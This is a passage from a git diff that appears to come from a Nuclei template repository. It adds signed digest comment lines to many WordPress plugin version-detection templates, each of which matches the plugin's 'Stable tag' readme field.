4a0a00473045022100986dfef594e59e15c307c90646190d961e1541e307312ffd403b8a6da78a8f1802201a3d2af345547b0fbf05169bb5adb92d5cfb993861cdaaf46027ef709606a045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..5d594816fe 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082f030dd764df33c926611a2e493b64e9c62c22e43830b8070c3cea4463c512e022100a4a824c1edb8307fc176cd750f89c47458eee92cec81321cd4aafb1d2ae3a1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..3283b0d71f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ed352d50e522b22191e7364fa7f48cbf3b68a4eb9cc0ef987a118c817e27ab6022100ff205e7aaa444e8a905bd44846e88ef76deccb6f83ea9b668427997da8c26097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..044d03c37c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204062d0afd7c36d09f37d46efd46c7d3878e1edc11efc512e06fb75f7e9dbf08202201d0566dfc9b1b4e9737454f5a1fb49b2da4e013ebb86cfa7f73104f69e20e4e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5efc2d7f06 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090b505663942eb741e73562223a471d1a4d5622fb1b7868907c67dacbd6de8f602204235fd52779f7db60a1ba12be100b2dd6b21a6ee453d1bdefb6aff9f83a4d986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..ae420ac7b9 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009caf7fbd9e2d9250c2ffa4088e35316eaa1050018c09f3f853fbb5a63f846a07022019695617a0b169daf28ed5af939da4119540c8f10bb0bcf7980b8fee39fa127a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..f49ecf399f 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008648e7c81250d4724280337d47b12d8f0c0f666bd3a1be5c07bd07b5a088d45a022100d7a3a883a5fac8f03082186330c09b34b94d186145105d7dc13823be680b2a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..921829f7a8 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4edbbb0e336ba35240678c235eede0c12d002c3ed77cb13ada3c48a1b395d65022100beea1f1ae792e300edf0788ea6541977c93dd5c9cd8081758ae6149486bf2965:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..d7f50bdfc0 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085b47572077e949b0f1582044be61871d31b0e594ab606ad7ff88d49cad1fa250221009c6c56dba2f07427f6f6c552cc4383ac245dba186569f2b0f2c7d428fa3e044a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..c9521ec335 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a725e5f93edcdacba57482b3989632a7e5d72e48aa1e71be9cc8b6a4cff979f02205b741305785178038bc2d5e179f1eb8632fc97c1731028f40cf8c6df725f6db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..207f8b5c3d 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea498b6d6c7be496691baff82369afe5172a69dfc05638a79cdb3673b6d2bfb002203e1c8ae1773dab868ec054d314cc25e0c84d2b0614e69da8d3cbf9ab14a0a024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..08f497c753 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074632153806f9c6b9dcad6e511f18e60725b7cce7492a743c9b62842fda931e902210096018222a596d8d16932517f4acc6f9610d8c54573b1232475eeb668c41c15f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..556907a736 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100853871e70cf24ed27e73998d3b230e2f76fc84945b259419f39d859667a619c0022075d6eb6bf395ff65b5ef08cb2c16753abe11f7d6e89464ebaa6a133c30db0336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..d135685166 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007e3b9800b9003af33ef3547c4bc9d1b6c512632730a5e2e52338d0e2e155f5b02206db7b96deaa58716fcda370f99af7b2f3005ef87ce39e34565a03bd1501c114c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..f5bb94ceed 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099ef1a7782cdac166a55cdf86a6379d7aede863af7e6f8f7df3697f2541ecd1b02201c39bfd9223ce26560807505234c58a412afb771c11c6b8ea43ec3f56c1988f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..3c91fa8559 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201990c204a5e257b153fb899a047c63f70a521f55ad2e7c0809d610fa08dfaa1e022100fa37dec080f2f47027e5ac0d81fc5167ceba81d2006920082259f54389afcdde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..70f0af1421 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c00afbea3517d80820b121de4b3384454fed4cbb16a2a377e229a2420f7310070220493bb476e8879571b13d11dba3f9cd8cd78362981b0529844e10bf1ff463a594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..54b0657f26 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220720eea89900bc0d8d35f95f4cbf5c96ff4ca24f016c9c4e835128de774c9b58b022032b6c137e38a5382b70bdec2f0b1f0c3bdf643c832c035d4d8e159d230351c19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..a9a3dcc543 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e400785e8024f2c644cbb8df6e0dd0d1238c1eb5d684bf8885df30d4de53f5cb02202887e2412ee943eaaa6f712d8579620533532f26bd746b998e4fa36d8745bc9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..c0335fa546 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200607f3ccab29f1b511aca3e2af3afb6d958877645f1f008fd3d9bd9d13e99bd502202a5610218ff18b6918562858f7811c60079aa1f45f0a7558ed68b4251396a9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..ad35a1dcd9 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d87f479793e9edc959dced48eb91e8f1de03f40a2af77915c30efd507c6e0e80022054ecce2df3f18a906528e696056e1d4fcdbfe3351d813524be7c8cc7431218d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..e09fb66cbf 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036067848fa950dbfb65c80c436081348d39437b6820430560bfe96c6b681ae6f022008001bc44a7e2609b3affcbb92679e5cdf138d99ce387815e2db2914594351a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..0f85d4607e 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098abf7a76ae40bfbdb521266da13ba82068ae9d3d6bb89f483cb051a1fadeffb022100bdcb83a6a3305f82f34c46796f42412e9ffefdd59a0bce18f120f035454a120a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..1857c1fac7 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eab4b629dd177b7021ccb0ba9a39d8916c25d7e93e77ff945a323e2a499bfcaf022100ac67c53a6fbd5e0b5eb0188ae0b7d0d40c68f24e8a02dbbcd154c3a7a627e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..0c6bd5b80c 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402210099415e003f43a586ba0c8b15cdddfb6e33f5c69d21e12cabf5afb46bcf58dfdf021f47a149e7b4cb0d726aaac0952a24ebf44e7de68db4cc7f5bde43553efb95b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..d7491122be 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2050eaff1ca68aed948b13f7ba35dece765fbf73b5bef3123626aeebbd703a0022055dc91a45be14f67dca26de383cc0230b2a9732e9427d991c3120860535142a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..f73c3bbdcf 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f50cb8e8d4426d1f1bef0216eda078fa134be5e7d3fa758a7bd8c10456000fcd022055bf136317d6690273ae097ec4c42042fdcf380cb08c2e6f94e05e8fdc32b379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..d9ab543c24 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025f717e32119d7e7ba7b0049a6002114712c09c6e126de24f8132395c553489d02202c97a7bdf654c7e199a566c2623ed6c9cd1bce2f6aaf966570ffe4a6e0dc25ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..debcbed71d 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100941443bc48e1406e1e5042a7362b982b68a7b0bd77a480b6b940672275e5a41a022100ef3053983623b9d0ce542f4cc5a0666eb26b5b5efdbbf6312668ac4d92166dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..90dfcafb02 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207481659a9d51aab62b4a0be17ddc7bd774adb2911578d4bac953cc604128e2a80220236f7e0277fd1356cc4976720041aa9e6237a139c8610e830bac000d1949f886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..4e5a2ddf17 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220509ece61bd719623e5178a117ba9ba673b54a74646022785c11c622ce6739498022065a301fcd36c088e61ddc4702428f025f0b399273fb02a4212d2395fcd3075a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..37ac7ce23b 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a454e0b03eb10755bd22e29208ed116d8a735300a7ee99e799371196844c76ec022100c6c8b748117fd68795601dcd120b94f9436398b4a3b73bd1e6fe676d503b9abe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..432cf497ff 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d1074368d66e13333f30c1ba0d6ff750222399182e5941a2397e20ad2108057022100fa8289fd8098cd4a3ab00a285b64896807f7f193b47f215aebf20b62b648deb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..bcf8f1acaf 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a46d082b8f64d9e6c1daf68851985908968c68709317b74b550c79125818b350022100d44108819ecd8ebff0cd65b62a147351f1d416b61729fe1c9b5b40fb8ba17a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..a9fa61d5de 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202792301cf437b68e1f9e3e42d3078411b839e38f72028da926a2300c4cdfaff3022100f98a91a41c65dbd7a951717c7f772128aeb9f21a1e86f9700ecc33ed5f94767e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..19b9ae7202 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045b3abfc49dc7e6e4177b45e80a83de6b25e4e7ae54fca87cc4c1c8733a4628a022075c8566c67c04735922d764ea2b5880612eb6323079e11eef08fcf87b2c9d0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..05a1f7f4a7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100918eb74380ea851fa607347c0704e611306b588c45b94f8dd791c03c9eeb3ab60221008ad2ae7ccc3cb852e403f86cfc9224124f3b9566923d09c5042a36bef88c7db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..63b43799db 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203a66ad2705fee8ff28984f97c805f84127b648e55786f0a1bc105044a3323a12022100f44deba13567d5aa77a58eaaec75437255b92da4f5e364a250d9965b14ceb240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..0b11f3f9c6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080adea2972829e9a8b98b931fe2b043c92fd4a9ac95551129da12cf94cc7880b02202c146fcc9960865b92d7c10a58fee2ab2a3315b9ad2be42283123b9a10f95b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..4a0caea93b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001f3a7af554744ecbb728aa8683add141796cc7baaf81e4d0445803d603fbb7f0220741a1a6cd91021271e502b59aaae91093f740753eccc907c5e61394f7897acad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..3f5b382c4f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2a9fdc3e9a4fc755e2a8bb1801deeb9730cb128c2a4f8c288830fb2024225be02200c352de72f3c17ce0ea9d346ecee5e2dcc398b48c414ed25736cb626db1a1269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..25f3eb170b 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b52375f65d0168a623a095705e8905041e50022854ca18c485af3e011f1f3f9f02207381b38884c75fba27960f99c20e3b0a0a19e87908350ce10df195caa8c7cb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..3741d17031 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df5e7c3ade0768564dc96807c0caabe3b3557e52150d3e7330b261feccb0dd3022075d76268a01e9af7c36ab5d1ba0a5f5f6dc05bc82412cc3076b64cdce21c4850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..05b09efb94 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008278c47430e9fb19da4cba19ce1af7fadb392d5103695e2e86955aceddd34c5b022100db9a3468ed54467696c085b76db57b4484fe39f1b6a90ec2919260c3f670b566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..6a7bc32c42 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068f81cdd45711102fe526e47a6dfd52c34a21c41812136750a9f6e382f1ac14d02207b87c166377ffcae438ff39ba751c893182da1d6ff8e39d482197b43a25f2b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..daa0deb7cf 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a43ddad5d4202e795047456e3e917e863beb18f37c0d5a81b2793b6f2eff69802204cc46c27b3e8619729af174fd7f5e1ca8c662c6fcf6f22d3407941b023483fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..4c42ddaf3e 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dca6ebd204d5b944b9944eb55ee6dd2e5bc1d05e80cd139f861efd023f8c6b230221009c15c1ae45d0cb09575138ab3a13a810be261ac624887ed147972585616e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml 